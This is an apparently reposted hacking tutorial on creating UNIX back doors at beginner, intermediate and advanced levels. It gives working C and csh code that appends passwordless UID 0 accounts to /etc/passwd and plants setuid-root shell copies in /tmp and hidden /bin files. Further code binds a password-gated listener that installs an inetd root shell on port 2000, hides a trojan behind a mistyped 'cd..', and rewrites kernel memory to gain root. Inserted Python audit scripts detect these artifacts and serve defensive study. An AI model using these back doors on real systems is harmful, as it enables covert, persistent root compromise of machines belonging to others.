Creating a UNIX back door: beginner, intermediate and advanced

ID MYHACK58:62201026187
Type myhack58
Reporter Anonymous
Modified 2010-02-14T00:00:00


Beginner level

The simplest method is to add a UID 0 account to the password file /etc/passwd. It is best not to do it this way, because as soon as the system administrator inspects the password file the extra account gives you away. The following C program adds a UID 0 account to /etc/passwd.

<++> Trojan/backdoor1.c

main()
{
    FILE *fd;
    fd = fopen("/etc/passwd", "a+");
    fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
}
<-->

A slightly more hidden variant is to take an unused account in the password file, change its UID to 0 and set the second field (the password field) to empty. (Note: if you are using a newer version of *nix, you may also have to modify the /etc/shadow file.)
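The two password-file tricks above are what an administrator's audit should look for. The following Python check is added here and is not part of the original article: it flags any UID 0 account other than root and any account with an empty password field, and the passwd text it scans is a constructed sample containing the article's hax0r line.

```python
# Added example (not from the article): audit passwd text for an extra
# UID 0 account and for an account whose password field was emptied.
# The text is passed in as a string so the check runs offline; on a live
# host pass the contents of /etc/passwd.

def audit_passwd(passwd_text, allowed_uid0=("root",)):
    """Return a list of (line_no, user, reason) findings."""
    findings = []
    for line_no, line in enumerate(passwd_text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user not in allowed_uid0:
            findings.append((line_no, user, "UID 0 account other than root"))
        if pw == "":
            # An empty second field means no password is asked for at all;
            # on a shadowed system this field is normally "x" or "*".
            findings.append((line_no, user, "empty password field"))
    return findings


# Constructed sample: a normal passwd fragment with the article's hax0r line
# and an existing account whose UID and password field were tampered with.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hax0r::0:0::/root:/bin/sh
games::0:60:games:/usr/games:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s: %s" % finding)
```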

Place a suid shell in the /tmp directory. Later, as soon as you run this program, you easily obtain root privileges. This method is probably the most popular. However, many systems clear the /tmp directory every few hours or at every boot, and some systems simply do not allow suid programs to be run from /tmp. Of course, you can modify or remove these restrictions, since as root you have permission to edit /var/spool/cron/crontabs/root and /etc/fstab. The following is the C source of a program that places a suid shell in /tmp.

<++> Trojan/backdoor2.c

main()
{
    system("cp /bin/sh /tmp/fid");
    system("chown root.root /tmp/fid");
    system("chmod 4755 /tmp/fid");
}
<-->

Intermediate level

The configuration file of the super-server daemon inetd. Under normal circumstances the system administrator does not check this file often, so it is a good place for a “back door”. So how do we build the best back door here? Remotely, of course, so that you can become root without needing a local account. First, some basics: the inetd process listens on various TCP and UDP ports for connection requests and, according to the request, starts the corresponding server process. The configuration file /etc/inetd.conf is very simple; its basic form is as follows:

(1)      (2)    (3)     (4)    (5)  (6)              (7)
ftp      stream tcp     nowait root /usr/etc/ftpd    ftpd
talk     dgram  udp     wait   root /usr/etc/ntalkd  ntalkd
mountd/1 stream rpc/tcp wait   root /usr/etc/mountd  mountd

1: The first column is the service name. The service name is mapped to a port number by looking up the /etc/services file (for TCP and UDP services) or by the portmap daemon (for RPC services). RPC remote procedure call services are recognised by the name/num format of the name and by the rpc flag in the third column.
2: The second column determines the socket type the service uses: stream, dgram or raw. In general, stream is for TCP services, dgram for UDP, and raw is used very rarely.
3: The third column identifies the communication protocol the service uses. The allowed types are listed in the protocols file. The protocol is almost always tcp or udp. For RPC services the protocol type is prefixed with rpc/.
4: If the daemon can handle multiple requests instead of processing one request and then exiting, the fourth column should be set to wait, which stops inetd from continually spawning new copies of the daemon. This option is used for daemons that handle a large number of small requests. If wait is not appropriate, fill in nowait.
5: The fifth column gives the username the daemon runs as.
6: The sixth column gives the fully qualified path name of the daemon.
7: The daemon's real name and its arguments.

If the job to be handled is trivial, for example it requires no user interaction, the inetd daemon handles it itself; in that case the sixth and seventh columns are simply 'internal'. So, to install a handy back door, you can pick an infrequently used service and replace its original daemon with one that produces some sort of back door, for example one that adds a UID 0 account or copies a suid shell.

A better method is to replace daytime, the daemon that provides the date and time service, with something that produces a suid root shell. Simply change the line in /etc/inetd.conf:

daytime stream tcp nowait root internal

to:

daytime stream tcp nowait /bin/sh sh -i

Then restart (remember: be sure to restart the inetd process):

killall -9 inetd
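From the defender's side, the daytime substitution above and the 'backdoor' inetd.conf line written by remoteback.c later in this article share a recognisable shape. This Python audit is added here and is not from the article: it parses inetd.conf text and flags a normally internal service pointed at a program, a shell in the user or server column, and an interactive shell argument; the configuration it scans is a constructed sample.

```python
# Added example (not from the article): audit inetd.conf text for the
# service substitutions described in this section.
import os

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}
# Services inetd normally serves itself, i.e. column 6 should be "internal".
INTERNAL_SERVICES = {"echo", "discard", "daytime", "chargen", "time"}

def audit_inetd_conf(conf_text):
    """Return (line_no, service, reason) findings for inetd.conf text."""
    findings = []
    for line_no, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            findings.append((line_no, fields[0], "too few columns"))
            continue
        service, _sock, _proto, _wait, user, server = fields[:6]
        args = fields[6:]
        if service in INTERNAL_SERVICES and server != "internal":
            findings.append((line_no, service, "internal service now runs " + server))
        # A shell in the user column (the daytime line above) or in the
        # server column (the line remoteback.c appends) is never legitimate.
        if os.path.basename(user) in SHELLS or os.path.basename(server) in SHELLS:
            findings.append((line_no, service, "server program is a shell"))
        if "-i" in args:
            findings.append((line_no, service, "interactive shell flag in arguments"))
    return findings


# Constructed sample: two normal entries followed by the two back-door forms.
SAMPLE_INETD_CONF = """\
# constructed sample inetd.conf
ftp      stream tcp nowait root /usr/etc/ftpd ftpd
echo     stream tcp nowait root internal
daytime  stream tcp nowait /bin/sh sh -i
backdoor stream tcp nowait root /bin/sh -i
"""

if __name__ == "__main__":
    for finding in audit_inetd_conf(SAMPLE_INETD_CONF):
        print("line %d: %s: %s" % finding)
```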

An even better and more subtle method is to forge a network service, so that the back door we provide is harder to detect, for example by protecting it with a password. If you cannot connect through telnetd but can still get remote access easily, that is great. The method is to bind “our own” daemon to a port; the program gives no prompt to external connections, but as long as the correct password is typed directly, you get into the system smoothly. The following is a demonstration program of this kind of back door. (Note: this program is not written very completely.)

<++> Trojan/remoteback.c
/* Coders: Theft
   Help from: Sector9, Halogen
   Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen,
   Psionic, g0d, Psionic. Groups: Ethical Mutiny Crew (EMC), Common Purpose
   hackers (CPH), Global Hell (gH), Team Sploit, Hong Kong Danger Duo, Tg0d,
   EHAP.
   Usage:
   Setup:
     gcc -o backhore backhore.c
     # ./backhore password &
   Run: Telnet to the host on port 4000. After connecting you will not be
   prompted for a password, this way it is less obvious; just type the
   password and press enter, after which you will be prompted for a
   command, pick 1-8.
   Distributers: Ethical Mutiny Crew
*/

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int main(int argc, char *argv[])
{
    int sockfd, new_fd, sin_size, numbytes, cmd;
    char ask[10] = "Command: ";
    char bytes, *buf, pass[40];
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;

    printf("\n Backhore BETA by Theft\n");
    printf(" 1: trojans rc.local\n");
    printf(" 2: sends a systemwide message\n");
    printf(" 3: binds a root shell on port 2000\n");
    printf(" 4: creates suid sh in /tmp,\n");
    printf(" 5: creates mutiny account uid 0 no passwd\n");
    printf(" 6: drops to suid shell\n");
    printf(" 7: information on backhore\n");
    printf(" 8: contact\n");

    if (argc != 2) {
        fprintf(stderr, "Usage: %s password\n", argv[0]);
        exit(1);
    }

    strncpy(pass, argv[1], 40);
    printf("..using password: %s..\n", pass);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
        perror("bind");
        exit(1);
    }

    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }

    sin_size = sizeof(SA);
    while (1) {  /* main accept() loop */
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (!fork()) {
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            fgets(buf, 40, stdin);
            if (!strcmp(buf, pass)) {
                printf("%s", ask);
                cmd = getchar();
                handle(cmd);
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while (waitpid(-1, NULL, WNOHANG) > 0);  /* rape the dying children */
    }
}

void handle(int cmd)
{
    FILE *fd;

    switch (cmd) {
    case '1':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("Trojaning rc.local\n");
        fd = fopen("/etc/passwd", "a+");
        fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
        fclose(fd);
        printf("Trojan complete.\n");
        break;
    case '2':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("Sending systemwide message..\n");
        system("wall Box owned via the Ethical Mutiny Crew");
        printf("Message sent.\n");
        break;
    case '3':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("\nAdding inetd backdoor... (-p)\n");
        fd = fopen("/etc/services", "a+");
        fprintf(fd, "backdoor\t2000/tcp\tbackdoor\n");
        fd = fopen("/etc/inetd.conf", "a+");
        fprintf(fd, "backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
        execl("killall", "-HUP", "inetd", NULL);
        printf("\ndone.\n");
        printf("telnet to port 2000\n\n");
        break;
    case '4':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("\nAdding Suid Shell... (-s)\n");
        system("cp /bin/sh /tmp/.sh");
        system("chmod 4700 /tmp/.sh");
        system("chown root:root /tmp/.sh");
        printf("\nSuid shell added.\n");
        printf("execute /tmp/.sh\n\n");
        break;
    case '5':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("\nAdding root account... (-u)\n");
        fd = fopen("/etc/passwd", "a+");
        fprintf(fd, "hax0r::0:0::/:/bin/bash\n");
        printf("\ndone.\n");
        printf("uid 0 and gid 0 account added\n\n");
        break;
    case '6':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("Executing suid shell..\n");
        execl("/bin/sh");
        break;
    case '7':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");
        printf("\nInfo... (-i)\n");
        printf("\n3 - Adds entries to the /etc/services & /etc/inetd.conf giving you\n");
        printf("a root shell on port 2000. example: telnet 2000\n\n");
        printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
        printf("executed gives you a root shell. example: /tmp/.sh\n\n");
        printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
        printf("The login is 'mutiny' and there is no passwd.");
        break;
    case '8':
        printf("\nBackhore BETA by Theft\n");
        printf("\n");  /* the contact line is garbled on the page */
        printf("\n\n");
        break;
    default:
        printf("unknown command: %d\n", cmd);
        break;
    }
}
<-->

Advanced level

The crontab program is very useful to a system administrator. The cron service is used to schedule a program to run at a specific month, date, weekday, hour and minute. If you are smart enough, you should take advantage of it to create a “back door” for us! With the cron service, you can have the back door program run every day at 2:00 (by now the network administrator should be asleep), which lets you easily enter the system, do whatever you want, and exit before the administrator gets up. The root user's crontab file is /var/spool/crontab/root, and its format is as follows:

(1) (2) (3) (4) (5) (6)
 0   0   *   *   3  /usr/bin/updatedb

1. Minute (0-60)
2. Hour (0-23)
3. Day of month (1-31)
4. Month (1-12)
5. Day of week (1-7)
6. The program to run

The above entry runs the program every Wednesday at 0:00. To build a back door in cron, just add the back door to /var/spool/crontab/root. For example, the program can check daily whether the user account we added to /etc/passwd is still valid. The following is an example:

0 0 * * * /usr/bin/retract

<++> backdoor/

#!/bin/csh

set evilflag = (`grep eviluser /etc/passwd`)

if ($#evilflag == 0) then
    set linecount = `wc -l /etc/passwd`
    cd
    cp /etc/passwd ./temppass
    @ linecount[1] /= 2
    @ linecount[1] += 1
    split -$linecount[1] ./temppass
    echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd
    rm ./xa* ./temppass
    echo Done...
else
endif
<-->


Of course, we can also write the Trojan program and place it in the /bin directory. When run with a specific command-line argument it generates a suid shell. The following is an example program:

<++> Trojan/backdoor3.c

#define pass "triad"

int main(argc, argv)
int argc;
char *argv[];
{
    int i = 0;

    if (argv[1]) {
        if (!(strcmp(pass, argv[1]))) {
            system("cp /bin/csh /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }

    printf("372f: Invalid control argument, unable to initialize. Retrying");
    for (; i < 10; i++) {
        fprintf(stderr, ".");
        sleep(1);
    }
    printf("\nAction aborted after 10 attempts.\n");
    return (0);
}
<-->
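backdoor2.c, remoteback.c (option 4) and backdoor3.c all leave a setuid-root copy of a shell on disk, either in /tmp or as a hidden dot-file in /bin. This Python check is added here and is not part of the article: it classifies setuid-root files by location and name; the inventory it scans is a constructed list of (path, mode, uid) triples, and scan_dirs() applies the same rule to a live filesystem.

```python
# Added example (not from the article): find planted setuid-root shell copies.
import os
import stat

WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp")
SYSTEM_BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")

def classify_setuid(path, mode, uid):
    """Return a reason if (path, st_mode, st_uid) looks like a planted
    setuid-root shell copy, otherwise None."""
    if not (mode & stat.S_ISUID) or uid != 0:
        return None
    directory, name = os.path.split(path)
    if any((directory + "/").startswith(r + "/") for r in WORLD_WRITABLE_DIRS):
        return "setuid-root file in world-writable directory"
    if directory in SYSTEM_BIN_DIRS and name.startswith("."):
        return "hidden setuid-root file in system binary directory"
    return None

def audit_inventory(inventory):
    return [(p, classify_setuid(p, m, u)) for p, m, u in inventory
            if classify_setuid(p, m, u)]

def scan_dirs(dirs):
    """Live variant: lstat every regular file below dirs and classify it."""
    inventory = []
    for d in dirs:
        for root, _subdirs, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    inventory.append((p, st.st_mode, st.st_uid))
    return audit_inventory(inventory)

# Constructed inventory mirroring the article's programs; mode is the full
# st_mode value, so 0o104755 is a regular file with permission bits 4755.
SAMPLE_INVENTORY = [
    ("/tmp/fid", 0o104755, 0),           # backdoor2.c
    ("/tmp/.sh", 0o104700, 0),           # remoteback.c option 4
    ("/bin/.swp121", 0o104755, 0),       # backdoor3.c
    ("/usr/bin/passwd", 0o104755, 0),    # legitimate setuid binary
    ("/tmp/notes.txt", 0o100644, 1000),  # ordinary file
]
```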


The following program finds the UID of the running program in kernel memory and changes it to 0, so that you get a suid root shell.

<++> Trojan/kmemthief.c

#define pass "triad"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];
{
    int count, fd;
    long where, lseek();

    if (argv[1]) {
        if (!(strcmp(pass, argv[1]))) {
            fd = (open("/dev/kmem", O_RDWR));

            if (fd < 0) {
                printf("Cannot read or write to /dev/kmem\n");
                perror(argv);
                exit(10);
            }

            userlocation = address();
            where = (lseek(fd, userlocation, 0));

            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv);
                exit(20);
            }

            count = read(fd, &userpage, sizeof(struct user));

            if (count != sizeof(struct user)) {
                printf("Cannot read user page\n");
                perror(argv);
                exit(30);
            }

            printf("Current UID: %d\n", userpage.u_ruid);
            printf("Current GID: %d\n", userpage.g_ruid);

            userpage.u_ruid = 0;
            userpage.u_rgid = 0;

            where = (lseek(fd, userlocation, 0));

            if (where != userlocation) {
                printf("Cannot seek to user page\n");
                perror(argv);
                exit(40);
            }

            write(fd, &userpage, ((char *)&(userpage.u_procp)) - ((char *)&userpage));

            execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
        }
    }
}
<-->


Have you ever mistakenly typed "cd.." instead of "cd .." on a UNIX system? That is a habit formed from using MS Windows and MS-DOS. Might the network administrator make this mistake too? If so, can we get him to make a “contribution” for us? For example, when he types "cd..", it activates our Trojan, so we do not have to log in to the system to activate it. The following is an example program:

<++> Trojan/dumb.c
/* This program adds a UID 0 account to /etc/passwd when the administrator
   accidentally types cd.. ; at the same time it performs the cd .. function
   itself, so as to fool the administrator. */

main()
{
    FILE *fd;
    fd = fopen("/etc/passwd", "a+");
    fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
    system("cd");
}
<-->